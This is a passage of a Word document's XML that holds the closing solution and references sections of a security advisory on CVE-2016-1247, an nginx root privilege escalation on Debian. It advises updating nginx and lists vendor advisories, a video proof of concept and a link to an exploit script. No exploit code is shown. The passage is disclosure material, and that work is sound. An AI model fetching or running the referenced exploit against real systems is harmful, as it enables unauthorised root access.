          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36468C0E" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B77D49E" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F24A1F1" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B656DA5" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2C3DA5" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7545893A" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AE6F4F" w14:textId="77777777" w:rsidR="00CD7DD6" w:rsidRPr="002B24A4" w:rsidRDefault="00CD7DD6" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F0D947" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC5FBF" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3681EBE4" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31436AF0" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026A3C41" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vendors were sent this advisory in advance and released patches prior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40962C88" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to the publication of the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C37299C" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B442C19" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Update to the latest nginx packages on your distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115CA08A" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29877F5D" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.debian.org/security/2016/dsa-3701</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E2DD339" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0D13A3" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.ubuntu.com/usn/usn-3114-1/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43B73D90" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C1A5FC" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B09AB3D" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFAEBDA" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1136AF83" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F7F998" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392F4796" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA19A2" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B165B60" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BC77EC" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="105170EE" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6605EC" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This advisory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDEFB3" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53E16C02" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F97B98" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43073B27" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07752535" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34211428" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2016-1247:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F1B52" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1247</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0297FC00" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAB2BFF" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Video PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C39E9F" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BA90118" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9BCC8F" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Debian security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0377CB" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.debian.org/security/2016/dsa-3701</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49178B86" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://security-tracker.debian.org/tracker/CVE-2016-1247</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27507949" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
